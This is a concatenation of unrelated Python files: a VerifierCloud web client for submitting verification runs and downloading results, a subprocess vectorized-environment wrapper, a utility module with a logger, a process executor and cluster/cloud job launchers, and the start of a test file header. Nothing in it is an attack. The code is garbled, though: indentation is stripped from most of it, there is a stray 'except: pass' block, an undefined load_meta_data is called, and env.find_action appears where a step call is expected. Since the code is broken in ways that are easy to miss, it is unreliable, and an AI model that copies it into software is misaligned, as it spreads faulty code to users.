logging.debug("Exception in SSE connection: %s", error)
return False
else:
return True
def _start_sse_connection(self):
while self._new_runs:
run_ids = set(self._web_interface._unfinished_runs.keys())
self._new_runs = False
# nothing to do
if len(run_ids) == 0:
return
params = []
for run_id in run_ids:
params.append(("run", run_id))
headers = {}
headers["Accept-Encoding"] = "UTF-8"
if self._web_interface._base64_user_pwd:
headers["Authorization"] = "Basic " + self._web_interface._base64_user_pwd
for k, v in self._web_interface.default_headers.items():
if k not in headers:
headers[k] = v
logging.debug("Creating Server-Send Event connection.")
try:
self._sse_client = ShouldReconnectSeeClient(
self._run_finished_url, self._should_reconnect,
verify='/etc/ssl/certs',
headers=headers, data=params)
except Exception as e:
logging.warning("Creating SSE connection failed: %s", e)
self._fall_back()
return
for message in self._sse_client:
data = message.data
tokens = data.split(" ")
if len(tokens) == 2:
run_id = tokens[0]
state = tokens[1]
if state == "FINISHED":
if run_id in run_ids:
logging.debug('Run %s finished.', run_id)
self._web_interface._download_result_async(run_id)
elif state == "UNKNOWN":
logging.debug('Run %s is not known by the webclient, trying to get the result.', run_id)
self._web_interface._download_result_async(run_id)
elif state == "ERROR":
self._web_interface._run_failed(run_id)
else:
logging.warning('Received unknown run state %s for run %s.', state, run_id)
run_ids.discard(run_id)
if self._shutdown or self._new_runs or len(run_ids) == 0:
break
else:
logging.warning("Received invalid message %s", data)
self._sse_client = None
# fall back to polling if the Server-Sent Events based approach failed
if len(run_ids) != 0 and not self._shutdown:
self._fall_back()
def _fall_back(self):
logging.info("Fall back to polling.")
self._web_interface._result_downloader = PollingResultDownloader(self._web_interface, self._result_poll_interval)
self._web_interface._result_downloader.start()
self.shutdown(wait=False)
def start(self):
self._new_runs = True
if self._sse_client:
self._sse_client.resp.close()
else:
future = self._state_receive_executor.submit(self._start_sse_connection)
future.add_done_callback(self._log_future_exception_and_fallback)
def shutdown(self, wait=True):
self._shutdown = True
if self._sse_client:
self._sse_client.resp.close()
self._state_receive_executor.shutdown(wait=wait)
except:
pass
class RunResultFuture(Future):
def __init__(self, web_interface, run_id):
super().__init__()
self._web_interface = web_interface
self._run_id = run_id
def cancel(self):
canceled = super().cancel()
if canceled:
try:
self._web_interface._stop_run(self._run_id)
except:
logging.warning("Stopping of run %s failed", self._run_id)
return canceled
class WebInterface:
"""
The WebInterface is an executor-like class for the submission of runs to the VerifierCloud.
"""
def __init__(self, web_interface_url, user_pwd, svn_branch='trunk', svn_revision='HEAD',
thread_count=1, result_poll_interval=2, user_agent=None, version=None):
"""
Creates a new WebInterface object.
The given svn revision is resolved (e.g. 'HEAD' -> 17495).
@param web_interface_url: the base URL of the VerifierCloud's web interface
@param user_pwd: user name and password in the format '<user_name>:<password>', or None if no authentication is required
@param svn_branch: the svn branch name or 'trunk', defaults to 'trunk'
@param svn_revision: the svn revision number or 'HEAD', defaults to 'HEAD'
@param thread_count: the number of threads for fetching results in parallel
@param result_poll_interval: the number of seconds to wait between polling results
"""
if not (1 <= thread_count <= MAX_SUBMISSION_THREADS):
sys.exit("Invalid number {} of client threads, needs to be between 1 and {}.".format(thread_count, MAX_SUBMISSION_THREADS))
if not 1 <= result_poll_interval:
sys.exit("Poll interval {} is too small, needs to be at least 1s.".format(result_poll_interval))
if not web_interface_url[-1] == '/':
web_interface_url += '/'
self.default_headers = {'Connection': 'Keep-Alive'}
if user_agent:
self.default_headers['User-Agent'] = \
'{}/{} (Python/{} {}/{})'.format(user_agent, version, platform.python_version(), platform.system(), platform.release())
self._webclient = urllib.urlparse(web_interface_url)
logging.info('Using VerifierCloud at %s', web_interface_url)
if user_pwd:
self._base64_user_pwd = base64.b64encode(user_pwd.encode("utf-8")).decode("utf-8")
else:
self._base64_user_pwd = None
self._unfinished_runs = {}
self._unfinished_runs_lock = threading.Lock()
self._downloading_result_futures = {}
self._download_attempts = {}
self.thread_count = thread_count
self._executor = ThreadPoolExecutor(thread_count)
self._thread_local = threading.local()
self._hash_code_cache = {}
self._group_id = str(random.randint(0, 1000000))
self._read_hash_code_cache()
self._resolved_tool_revision(svn_branch, svn_revision)
self._tool_name = self._request_tool_name()
try:
self._result_downloader = SseResultDownloader(self, web_interface_url, result_poll_interval)
except:
self._result_downloader = PollingResultDownloader(self, result_poll_interval)
def _read_hash_code_cache(self):
if not os.path.isfile(HASH_CODE_CACHE_PATH):
return
with open(HASH_CODE_CACHE_PATH, mode='r') as hashCodeCacheFile:
for line in hashCodeCacheFile:
tokens = line.strip().split('\t')
if len(tokens) == 3:
self._hash_code_cache[(tokens[0], tokens[1])] = tokens[2]
def _write_hash_code_cache(self):
directory = os.path.dirname(HASH_CODE_CACHE_PATH)
try:
os.makedirs(directory, exist_ok=True)
with tempfile.NamedTemporaryFile(dir=directory, delete=False) as tmpFile:
for (path, mTime), hashValue in self._hash_code_cache.items():
line = (path + '\t' + mTime + '\t' + hashValue + '\n').encode()
tmpFile.write(line)
os.renames(tmpFile.name, HASH_CODE_CACHE_PATH)
except OSError as e:
logging.warning("Could not write hash-code cache file to %s: %s", HASH_CODE_CACHE_PATH, e.strerror)
def _resolved_tool_revision(self, svn_branch, svn_revision):
path = self._webclient.path + "tool/version?svnBranch=" + svn_branch \
+ "&revision=" + svn_revision
(resolved_svn_revision, _) = self._request("GET", path)
self._svn_branch = svn_branch
self._svn_revision = resolved_svn_revision.decode("UTF-8")
def _request_tool_name(self):
path = self._webclient.path + "tool/name"
(tool_name, _) = self._request("GET", path)
return tool_name.decode("UTF-8")
def tool_revision(self):
return self._svn_branch + ':' + self._svn_revision
def tool_name(self):
return self._tool_name
def _get_sha1_hash(self, path):
path = os.path.abspath(path)
mTime = str(os.path.getmtime(path))
if ((path, mTime) in self._hash_code_cache):
return self._hash_code_cache[(path, mTime)]
else:
with open(path, 'rb') as file:
hashValue = hashlib.sha1(file.read()).hexdigest()
self._hash_code_cache[(path, mTime)] = hashValue
return hashValue
def _create_and_add_run_future(self, run_id):
result = RunResultFuture(self, run_id)
with self._unfinished_runs_lock:
self._unfinished_runs[run_id] = result
return result
def submit_witness_validation(self, witness_path, program_path, configuration=None, user_pwd=None):
"""
Submits a single witness validation run to the VerifierCloud.
@note: flush_runs() should be called after the submission of the last run.
@param witness_path: path to the file containing the witness
@param program_path: path to the file containing the program
@param configuration: name of configuration (optional)
@param user_pwd: overrides the user name and password given in the constructor (optional)
"""
# collect parameters
params = {}
with open(witness_path, 'rb') as witness_file:
params['errorWitnessText'] = witness_file.read()
with open(program_path, 'rb') as program_file:
params['programText'] = program_file.read()
if configuration:
params['configuration'] = configuration
# prepare request
headers = {"Content-Type": "application/x-www-form-urlencoded",
"Content-Encoding": "deflate",
"Accept": "text/plain"}
paramsCompressed = zlib.compress(urllib.urlencode(params, doseq=True).encode('utf-8'))
path = self._webclient.path + "runs/witness_validation/"
(run_id, _) = self._request("POST", path, paramsCompressed, headers, user_pwd=user_pwd)
run_id = run_id.decode("UTF-8")
logging.debug('Submitted witness validation run with id %s', run_id)
return self._create_and_add_run_future(run_id)
def submit(self, run, limits, cpu_model, result_files_pattern, priority='IDLE', user_pwd=None, svn_branch=None, svn_revision=None):
"""
Submits a single run to the VerifierCloud.
@note: flush_runs() should be called after the submission of the last run.
@param run: The input for the run: command line options (run.options),
source files (run.sourcefiles),
property file (run.propertyfile),
identifier for error messages (run.identifier)
@param limits: dict of limitations for the run (memlimit, timelimit, corelimit, softtimelimit)
@param cpu_model: substring of CPU model to use or 'None' for no restriction
@param result_files_pattern: the result is filtered with the given glob pattern; '**' means no restriction, and None or the empty string matches no files.
@param priority: the priority of the submitted run, defaults to 'IDLE'
@param user_pwd: overrides the user name and password given in the constructor (optional)
@param svn_branch: overrides the svn branch given in the constructor (optional)
@param svn_revision: overrides the svn revision given in the constructor (optional)
"""
return self._submit(run, limits, cpu_model, result_files_pattern, priority, user_pwd, svn_branch, svn_revision)
def _submit(self, run, limits, cpu_model, result_files_pattern, priority, user_pwd, svn_branch, svn_revision, counter=0):
programTextHashs = []
for programPath in run.sourcefiles:
programTextHashs.append(self._get_sha1_hash(programPath))
params = {'programTextHash': programTextHashs}
params['svnBranch'] = svn_branch or self._svn_branch
params['revision'] = svn_revision or self._svn_revision
if run.propertyfile:
with open(run.propertyfile, 'r') as propertyFile:
propertyText = propertyFile.read()
params['propertyText'] = propertyText
if MEMLIMIT in limits:
params['memoryLimitation'] = limits[MEMLIMIT]
if TIMELIMIT in limits:
params['timeLimitation'] = limits[TIMELIMIT]
if SOFTTIMELIMIT in limits:
params['softTimeLimitation'] = limits[SOFTTIMELIMIT]
if CORELIMIT in limits:
params['coreLimitation'] = limits[CORELIMIT]
if cpu_model:
params['cpuModel'] = cpu_model
if result_files_pattern:
params['resultFilesPattern'] = result_files_pattern
else:
params['resultFilesPattern'] = ''
if priority:
params['priority'] = priority
invalidOption = self._handle_options(run, params, limits)
if invalidOption:
raise WebClientError('Command {0} contains option "{1}" that is not usable with the webclient. '\
.format(run.options, invalidOption))
params['groupId'] = self._group_id
# prepare request
headers = {"Content-Type": "application/x-www-form-urlencoded",
"Content-Encoding": "deflate",
"Accept": "text/plain"}
paramsCompressed = zlib.compress(urllib.urlencode(params, doseq=True).encode('utf-8'))
path = self._webclient.path + "runs/"
(run_id, statusCode) = self._request("POST", path, paramsCompressed, headers, [200, 412], user_pwd)
# program files given as hash value are not known by the cloud system
if statusCode == 412 and counter < 1:
headers = {"Content-Type": "application/octet-stream",
"Content-Encoding": "deflate"}
# upload all used program files
filePath = self._webclient.path + "files/"
for programPath in run.sourcefiles:
with open(programPath, 'rb') as programFile:
compressedProgramText = zlib.compress(programFile.read(), 9)
self._request('POST', filePath, compressedProgramText, headers, [200, 204], user_pwd)
# retry submission of run
return self._submit(run, limits, cpu_model, result_files_pattern, priority, user_pwd, svn_branch, svn_revision, counter + 1)
else:
run_id = run_id.decode("UTF-8")
logging.debug('Submitted run with id %s', run_id)
return self._create_and_add_run_future(run_id)
def _handle_options(self, run, params, rlimits):
# TODO: use code from the CPAchecker module, which adds -stats and sets -timelimit,
# instead of doing it here manually, too
options = []
specification_texts = []
if self._tool_name == "CPAchecker":
options.append("statistics.print=true")
if 'softtimelimit' in rlimits and not '-timelimit' in options:
options.append("limits.time.cpu=" + str(rlimits['softtimelimit']) + "s")
if run.options:
i = iter(run.options)
while True:
try:
option = next(i)
if len(option) == 0:
continue
if option == "-heap":
params['heap'] = next(i)
elif option == "-stack":
params['stack'] = next(i)
elif option == "-noout":
options.append("output.disable=true")
elif option == "-outputpath":
options.append("output.path=" + next(i))
elif option == "-logfile":
options.append("log.file=" + next(i))
elif option == "-nolog":
options.append("log.level=OFF")
options.append("log.consoleLevel=OFF")
elif option == "-stats":
# ignore, is always set by this script
pass
elif option == "-disable-java-assertions":
params['disableJavaAssertions'] = 'true'
elif option == "-java":
options.append("language=JAVA")
elif option == "-32":
options.append("analysis.machineModel=Linux32")
elif option == "-64":
options.append("analysis.machineModel=Linux64")
elif option == "-entryfunction":
options.append("analysis.entryFunction=" + next(i))
elif option == "-timelimit":
options.append("limits.time.cpu=" + next(i))
elif option == "-skipRecursion":
options.append("cpa.callstack.skipRecursion=true")
options.append("analysis.summaryEdges=true")
elif option == "-cbmc":
options.append("analysis.checkCounterexamples=true")
options.append("counterexample.checker=CBMC")
elif option == "-preprocess":
options.append("parser.usePreprocessor=true")
elif option == "-generateReport":
params['generateReport'] = 'true'
elif option == "-spec":
spec_path = next(i)
with open(spec_path, 'r') as spec_file:
file_text = spec_file.read()
if spec_path[-8:] == ".graphml":
params['errorWitnessText'] = file_text
elif spec_path[-4:] == ".prp":
params['propertyText'] = file_text
else:
specification_texts.append(file_text)
elif option == "-config":
configPath = next(i)
tokens = configPath.split('/')
if not (tokens[0] == "config" and len(tokens) == 2):
logging.warning('Configuration %s of run %s is not from the default config directory.',
configPath, run.identifier)
return configPath
config = tokens[1].split('.')[0]
params['configuration'] = config
elif option == "-setprop":
options.append(next(i))
elif option[0] == '-' and 'configuration' not in params :
params['configuration'] = option[1:]
else:
return option
except StopIteration:
break
params['option'] = options
params['specificationText'] = specification_texts
return None
def flush_runs(self):
"""
Starts the execution of all previously submitted runs in the VerifierCloud.
The web interface groups runs and submits them to the VerifierCloud only from time to time.
This method forces the web interface to do this immediately and starts downloading of results.
"""
headers = {"Content-Type": "application/x-www-form-urlencoded",
"Content-Encoding": "deflate",
"Connection": "Keep-Alive"}
params = {"groupId": self._group_id}
paramsCompressed = zlib.compress(urllib.urlencode(params, doseq=True).encode('utf-8'))
path = self._webclient.path + "runs/flush"
self._request("POST", path, paramsCompressed, headers, expectedStatusCodes=[200, 204])
self._result_downloader.start()
def _is_finished(self, run_id):
headers = {"Accept": "text/plain"}
path = self._webclient.path + "runs/" + run_id + "/state"
try:
(state, _) = self._request("GET", path, "", headers)
state = state.decode('utf-8')
if state == "FINISHED":
logging.debug('Run %s finished.', run_id)
if state == "UNKNOWN":
logging.debug('Run %s is not known by the webclient, trying to get the result.', run_id)
return state
except urllib2.HTTPError as e:
logging.warning('Could not get run state %s: %s', run_id, e.reason)
return False
def _download_result(self, run_id):
# download result as zip file
headers = {"Accept": "application/zip"}
path = self._webclient.path + "runs/" + run_id + "/result"
(zip_content, _) = self._request("GET", path, {}, headers)
return zip_content
def _download_result_async(self, run_id):
def callback(downloaded_result):
run_id = self._downloading_result_futures.pop(downloaded_result)
exception = downloaded_result.exception()
if not exception:
with self._unfinished_runs_lock:
result_future = self._unfinished_runs.pop(run_id, None)
if result_future:
result_future.set_result(downloaded_result.result())
else:
logging.info('Could not get result of run %s: %s', run_id, downloaded_result.exception())
# client error
if type(exception) is urllib2.HTTPError and 400 <= exception.code and exception.code <= 499:
attempts = self._download_attempts.pop(run_id, 1)
if attempts < 10:
self._download_attempts[run_id] = attempts + 1
self._download_result_async(run_id)
else:
self._run_failed(run_id)
else:
# retry it
self._download_result_async(run_id)
if run_id not in self._downloading_result_futures.values(): # result is not downloaded
future = self._executor.submit(self._download_result, run_id)
self._downloading_result_futures[future] = run_id
future.add_done_callback(callback)
def _run_failed(self, run_id):
run_result_future = self._unfinished_runs.pop(run_id, None)
if run_result_future:
logging.warning('Execution of run %s failed.', run_id)
run_result_future.set_exception(WebClientError("Execution failed."))
def shutdown(self):
"""
Cancels all unfinished runs and stops all internal threads.
"""
self._result_downloader.shutdown()
if len(self._unfinished_runs) > 0:
logging.info("Stopping tasks on server...")
stop_executor = ThreadPoolExecutor(max_workers=5 * self.thread_count)
stop_tasks = set()
with self._unfinished_runs_lock:
for runId in self._unfinished_runs.keys():
stop_tasks.add(stop_executor.submit(self._stop_run, runId))
self._unfinished_runs[runId].set_exception(WebClientError("WebInterface was stopped."))
self._unfinished_runs.clear()
for task in stop_tasks:
task.result()
stop_executor.shutdown(wait=True)
logging.info("Stopped all tasks.")
self._write_hash_code_cache()
self._executor.shutdown(wait=True)
def _stop_run(self, run_id):
with self._unfinished_runs_lock:
self._unfinished_runs.pop(run_id, None)
path = self._webclient.path + "runs/" + run_id
try:
self._request("DELETE", path, expectedStatusCodes=[200, 204, 404])
except urllib2.HTTPError as e:
logging.info("Stopping of run %s failed: %s", run_id, e.reason)
def _request(self, method, path, body={}, headers={}, expectedStatusCodes=[200], user_pwd=None):
connection = self._get_connection()
if user_pwd:
base64_user_pwd = base64.b64encode(user_pwd.encode("utf-8")).decode("utf-8")
headers["Authorization"] = "Basic " + base64_user_pwd
elif self._base64_user_pwd:
headers["Authorization"] = "Basic " + self._base64_user_pwd
for k, v in self.default_headers.items():
if k not in headers:
headers[k] = v
counter = 0
while (counter < 5):
counter += 1
# send request
try:
connection.request(method, path, body=body, headers=headers)
response = connection.getresponse()
except Exception as e:
if (counter < 5):
logging.debug("Exception during %s request to %s: %s", method, path, e)
# create new TCP connection and try to send the request
connection.close()
sleep(1)
continue
else:
raise
if response.status in expectedStatusCodes:
return (response.read(), response.getcode())
else:
message = ""
if response.status == 401:
message = 'Error 401: Permission denied. Please check the URL given to --cloudMaster and specify credentials if necessary.'
elif response.status == 404:
message = 'Error 404: Not found. Please check the URL given to --cloudMaster.'
elif response.status == 503:
message = 'Error 503: Service Unavailable.'
if counter < 5:
logging.debug(message)
sleep(60)
continue
else:
message += response.read().decode('UTF-8')
logging.warning(message)
raise urllib2.HTTPError(path, response.getcode(), message, response.getheaders(), None)
def _get_connection(self):
connection = getattr(self._thread_local, 'connection', None)
if connection is None:
if self._webclient.scheme == 'http':
self._thread_local.connection = AutoCloseHTTPConnection(self._webclient.netloc, timeout=CONNECTION_TIMEOUT)
elif self._webclient.scheme == 'https':
self._thread_local.connection = AutoCloseHTTPSConnection(self._webclient.netloc, timeout=CONNECTION_TIMEOUT)
else:
raise WebClientError("Unknown protocol {0}.".format(self._webclient.scheme))
connection = self._thread_local.connection
return connection
def _open_output_log(output_path):
log_file_path = output_path + "output.log"
logging.info('Log file is written to ' + log_file_path + '.')
return open(log_file_path, 'wb')
def _handle_run_info(values):
values["memUsage"] = int(values.pop("memory").strip('B'))
# remove irrelevant columns
values.pop("command", None)
values.pop("returnvalue", None)
values.pop("timeLimit", None)
values.pop("coreLimit", None)
values.pop("memoryLimit", None)
values.pop("outerwalltime", None)
values.pop("cpuCores", None)
values.pop("cpuCoresDetails", None)
values.pop("memoryNodes", None)
values.pop("memoryNodesAllocation", None)
print("Run Information:")
for key in sorted(values.keys()):
if not key.startswith("@"):
print ('\t' + str(key) + ": " + str(values[key]))
return int(values["exitcode"])
def _handle_host_info(values):
print("Host Information:")
for key in sorted(values.keys()):
print ('\t' + str(key) + ": " + str(values[key]))
def _handle_special_files(result_zip_file, files, output_path):
logging.info("Results are written to %s", output_path)
for file in SPECIAL_RESULT_FILES:
if file in files and file != RESULT_FILE_LOG:
result_zip_file.extract(file, output_path)
def handle_result(zip_content, output_path, run_identifier, result_files_pattern='*',
open_output_log=_open_output_log,
handle_run_info=_handle_run_info,
handle_host_info=_handle_host_info,
handle_special_files=_handle_special_files,
):
"""
Parses the given result ZIP archive: extracts meta information
and passes it on to the given handler functions.
The default handler functions print some relevant info and write it all to 'output_path'.
@return: the return value of CPAchecker
"""
# unzip and read result
return_value = None
try:
try:
with zipfile.ZipFile(io.BytesIO(zip_content)) as result_zip_file:
return_value = _handle_result(result_zip_file, output_path,
open_output_log, handle_run_info, handle_host_info, handle_special_files,
result_files_pattern, run_identifier)
except zipfile.BadZipfile:
logging.warning('Server returned illegal zip file with results of run %s.', run_identifier)
# Dump ZIP to disk for debugging
with open(output_path + '.zip', 'wb') as zip_file:
zip_file.write(zip_content)
except IOError as e:
logging.warning('Error while writing results of run %s: %s', run_identifier, e)
return return_value
def _handle_result(resultZipFile, output_path,
open_output_log, handle_run_info, handle_host_info, handle_special_files,
result_files_pattern, run_identifier):
files = set(resultZipFile.namelist())
# extract run info
if RESULT_FILE_RUN_INFO in files:
with resultZipFile.open(RESULT_FILE_RUN_INFO) as runInformation:
return_value = handle_run_info(_parse_cloud_file(runInformation))
else:
return_value = None
logging.warning('Missing result for run %s.', run_identifier)
# extract host info
if RESULT_FILE_HOST_INFO in files:
with resultZipFile.open(RESULT_FILE_HOST_INFO) as hostInformation:
handle_host_info(_parse_cloud_file(hostInformation))
else:
logging.warning('Missing host information for run %s.', run_identifier)
# extract log file
if RESULT_FILE_LOG in files:
with open_output_log(output_path) as log_file:
with resultZipFile.open(RESULT_FILE_LOG) as result_log_file:
for line in result_log_file:
log_file.write(line)
else:
logging.warning('Missing log file for run %s.', run_identifier)
handle_special_files(resultZipFile, files, output_path)
# extract result files:
if result_files_pattern:
files = files - SPECIAL_RESULT_FILES
files = fnmatch.filter(files, result_files_pattern)
if files:
resultZipFile.extractall(output_path, files)
return return_value
def _parse_cloud_file(file):
"""
Parses a file containing key value pairs in each line.
@return: a dict of the parsed key value pairs.
"""
values = {}
for line in file:
(key, value) = line.decode('utf-8').split("=", 1)
value = value.strip()
values[key] = value
return values
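# Hedged usage sketch for _parse_cloud_file(): the run/host info files inside the
# result ZIP are plain "key=value" lines; here they are fed from an in-memory byte
# stream instead of a real archive member (the keys/values below are placeholders).
def _parse_cloud_file_demo():
    import io
    fake_info = io.BytesIO(b"exitcode=0\nwalltime=12.3s\nmemory=104857600B\n")
    # -> {'exitcode': '0', 'walltime': '12.3s', 'memory': '104857600B'}
    return _parse_cloud_file(fake_info)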
|
subproc_vec_env.py
|
import numpy as np
from multiprocessing import Process, Pipe
from vec_env import VecEnv, CloudpickleWrapper
def worker(remote, parent_remote, env_fn_wrapper):
parent_remote.close()
env = env_fn_wrapper.x()
while True:
cmd, data = remote.recv()
if cmd == 'step':
ob, reward, done, info = env.find_action(data)
if done:
ob = env.reset()
remote.send((ob, reward, done, info))
elif cmd == 'reset':
ob = env.reset()
remote.send(ob)
elif cmd == 'reset_task':
ob = env.reset_task()
remote.send(ob)
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces':
remote.send((env.observation_space, env.action_space))
else:
raise NotImplementedError
class SubprocVecEnv(VecEnv):
def __init__(self, env_fns, spaces=None):
"""
envs: list of gym environments to run in subprocesses
"""
self.waiting = False
self.closed = False
nenvs = len(env_fns)
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
self.ps = [Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)))
for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)]
for p in self.ps:
p.daemon = True # if the main process crashes, we should not cause things to hang
p.start()
for remote in self.work_remotes:
remote.close()
self.remotes[0].send(('get_spaces', None))
observation_space, action_space = self.remotes[0].recv()
VecEnv.__init__(self, len(env_fns), observation_space, action_space)
def step_async(self, actions):
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
self.waiting = True
def step_wait(self):
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, rews, dones, infos = zip(*results)
return np.stack(obs), np.stack(rews), np.stack(dones), infos
def reset(self):
for remote in self.remotes:
remote.send(('reset', None))
return np.stack([remote.recv() for remote in self.remotes])
def reset_task(self):
for remote in self.remotes:
remote.send(('reset_task', None))
return np.stack([remote.recv() for remote in self.remotes])
def close(self):
if self.closed:
return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
self.closed = True
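# Hedged usage sketch: build a SubprocVecEnv from a couple of environment factories.
# Assumes gym is installed; 'CartPole-v1' is only an example environment id. Note that
# the worker above maps the 'step' command to env.find_action(), so stepping assumes
# environments that expose that method; the sketch only resets and closes.
def _subproc_vec_env_demo(num_envs=2):
    import gym
    env_fns = [lambda: gym.make('CartPole-v1') for _ in range(num_envs)]
    vec_env = SubprocVecEnv(env_fns)
    obs = vec_env.reset()   # stacked observations, one row per subprocess env
    vec_env.close()
    return obs.shape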
|
util.py
|
import sys
import os
import json
import numpy as np
from itertools import cycle
from config import BASE_DIR, DATA_DIR
""" Custom Logger """
import sys
class Logger:
def __init__(self, filename):
self.console = sys.stdout
self.file = open(filename, 'w')
def write(self, message):
self.console.write(message)
self.file.write(message)
def flush(self):
self.console.flush()
self.file.flush()
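# Minimal usage sketch for Logger: tee stdout to a file (the log path is a placeholder).
def _logger_demo(log_path='run.log'):
    sys.stdout = Logger(log_path)
    print('this line goes to the console and to run.log')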
""" Async executer """
import multiprocessing
class AsyncExecutor:
def __init__(self, n_jobs=1):
self.num_workers = n_jobs if n_jobs > 0 else multiprocessing.cpu_count()
self._pool = []
self._populate_pool()
def run(self, target, *args_iter, verbose=False):
workers_idle = [False] * self.num_workers
tasks = list(zip(*args_iter))
n_tasks = len(tasks)
while not all(workers_idle):
for i in range(self.num_workers):
if not self._pool[i].is_alive():
self._pool[i].terminate()
if len(tasks) > 0:
if verbose:
print(n_tasks-len(tasks))
next_task = tasks.pop(0)
self._pool[i] = _start_process(target, next_task)
else:
workers_idle[i] = True
def _populate_pool(self):
self._pool = [_start_process(_dummy_fun) for _ in range(self.num_workers)]
def _start_process(target, args=None):
if args:
p = multiprocessing.Process(target=target, args=args)
else:
p = multiprocessing.Process(target=target)
p.start()
return p
def _dummy_fun():
pass
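# Hedged usage sketch for AsyncExecutor: run a top-level function over a list of
# argument values in separate processes (the target must be picklable, hence top-level).
def _square(x):
    print(x * x)

def _async_executor_demo():
    executor = AsyncExecutor(n_jobs=2)
    # run() zips its argument iterables into one argument tuple per task.
    executor.run(_square, [1, 2, 3, 4])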
""" Command generators """
def generate_base_command(module, flags=None, unbuffered=True):
""" Module is a python file to execute """
interpreter_script = sys.executable
base_exp_script = os.path.abspath(module.__file__)
if unbuffered:
base_cmd = interpreter_script + ' -u ' + base_exp_script
else:
base_cmd = interpreter_script + ' ' + base_exp_script
if flags is not None:
assert isinstance(flags, dict), "Flags must be provided as dict"
for flag, setting in flags.items():
if type(setting) == bool:
if setting:
base_cmd += f" --{flag}"
else:
base_cmd += f" --{flag}={setting}"
return base_cmd
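# Hedged sketch of how flags are rendered: boolean flags become bare switches,
# everything else becomes --flag=value. This module itself serves as the target
# script; the flag names are hypothetical.
def _base_command_demo():
    current_module = sys.modules[__name__]
    # -> '<python> -u <.../util.py> --seed=3 --verbose'
    return generate_base_command(current_module, flags={'seed': 3, 'verbose': True})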
def generate_run_commands(command_list, num_cpus=1, num_gpus=1, dry=False, n_hosts=1, mem=6000, long=False, mode='local',
experiment_name='run', promt=True, oci_shape='VM.Standard.E3.Flex.16', run_ids=None):
if mode == 'leonhard':
cluster_cmds = []
bsub_cmd = 'bsub ' + \
f'-W {23 if long else 3}:59 ' + \
f'-R "rusage[mem={mem}]" ' + \
f'-R "rusage[ngpus_excl_p={num_gpus}]" ' + \
f'-n {num_cpus} ' + \
f'-R "span[hosts={n_hosts}]" '
for python_cmd in command_list:
cluster_cmds.append(bsub_cmd + python_cmd)
if promt:
answer = input(f"About to submit {len(cluster_cmds)} compute jobs to the cluster. Proceed? [yes/no]")
else:
answer = 'yes'
if answer == 'yes':
for cmd in cluster_cmds:
if dry:
print(cmd)
else:
os.system(cmd)
elif mode == 'oci':
import oci_launcher.mode as mode
import oci_launcher.mount as mount
from datetime import datetime
from oci_launcher.launch import launch_python
if promt:
answer = input(f"About to launch {len(command_list)} OCI instances. Proceed? [yes/no]")
else:
answer = 'yes'
if answer == 'yes':
def launch_command_oci(command, run_id):
target_file = command.split(" ")[1]
cmd_args = " ".join(command.split(" ")[2:])
REMOTE_PYTHON_INTERPRETER = '/home/ubuntu/miniconda3/envs/meta-bo/bin/python -u'
# import oci_launcher.ssh as ssh
# from oci_launcher.config import SSH_KEY_FILE
# mode_ssh = mode.SSH(
# credentials=ssh.SSHCredentials(hostname='152.67.66.222', username='ubuntu', identity_file=SSH_KEY_FILE),
# )
mode_oci = mode.OCIMode(oci_shape=oci_shape, run_id=run_id)
MODE = mode_oci
mounts = [
mount.MountLocal(local_dir=BASE_DIR + '/', mount_point='/home/ubuntu/meta-bo-febo',
pythonpath=True, filter_dir=['runs/*']),
mount.MountDropbox(mount_point='/home/ubuntu/meta-bo-febo/runs', dropbox_path='/meta-bo-febo_runs',
output=True,
skip_folders='runs')
]
launch_python(target=target_file, mount_points=mounts,
target_mount_dir='/home/ubuntu/meta-bo-febo',
mode=MODE, args=cmd_args, verbose=True,
python_cmd=REMOTE_PYTHON_INTERPRETER, tmux=True,
stdout_file='/home/ubuntu/meta-bo-febo/runs/%s.out' % run_id,
install_packages=['psutil'])
if run_ids is None:
run_ids = ['%s_%s_%s_%s'%(experiment_name, datetime.now().strftime("%d-%m-%y_%H:%M:%S"),
str(abs(cmd.__hash__())), np.random.randint(10**4)) for cmd in command_list]
else:
run_ids = ['%s_%s_%s' % (exp_id, datetime.now().strftime("%d-%m-%y_%H:%M:%S"), np.random.randint(10**4)) for exp_id in run_ids]
assert len(run_ids) == len(command_list)
exec = AsyncExecutor(n_jobs=len(command_list))
exec.run(launch_command_oci, command_list, run_ids)
elif mode == 'local':
if promt:
answer = input(f"About to run {len(command_list)} jobs in a loop. Proceed? [yes/no]")
else:
answer = 'yes'
if answer == 'yes':
for cmd in command_list:
if dry:
print(cmd)
else:
os.system(cmd)
elif mode == 'local_async':
if promt:
answer = input(f"About to launch {len(command_list)} commands in {num_cpus} local processes. Proceed? [yes/no]")
else:
answer = 'yes'
if answer == 'yes':
if dry:
for cmd in command_list:
print(cmd)
else:
exec = AsyncExecutor(n_jobs=num_cpus)
cmd_exec_fun = lambda cmd: os.system(cmd)
exec.run(cmd_exec_fun, command_list)
else:
raise NotImplementedError
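# Hedged usage sketch: a dry 'local' run only prints the commands instead of executing
# them; the echo commands are placeholders.
def _run_commands_demo():
    cmds = ['echo hello', 'echo world']
    generate_run_commands(cmds, mode='local', dry=True, promt=False)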
""" Hashing and Encoding dicts to JSON """
class NumpyArrayEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, np.integer):
return int(obj)
elif isinstance(obj, np.floating):
return float(obj)
elif isinstance(obj, np.ndarray):
return obj.tolist()
else:
return super(NumpyArrayEncoder, self).default(obj)
def hash_dict(d):
return str(abs(json.dumps(d, sort_keys=True, cls=NumpyArrayEncoder).__hash__()))
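# Hedged sketch for hash_dict: sort_keys=True makes the result independent of key order,
# and NumpyArrayEncoder handles numpy scalars/arrays. Python's string hashing is salted
# per process, so the value is only stable within a single run.
def _hash_dict_demo():
    return hash_dict({'lr': 1e-3, 'layers': np.array([32, 32])})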
if __name__ == '__main__':
load_meta_data('/home/jonasrothfuss/Dropbox/Eigene_Dateien/ETH/02_Projects/16_Inspire_Meta_BO/inspire_safe_meta_bo/data/gp_ucb_meta_data/RandomMixtureMetaEnv_20_tasks_20_samples.json')
|
football_env_test.py
|
# coding=utf-8
# Copyright 2019 Google LLC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
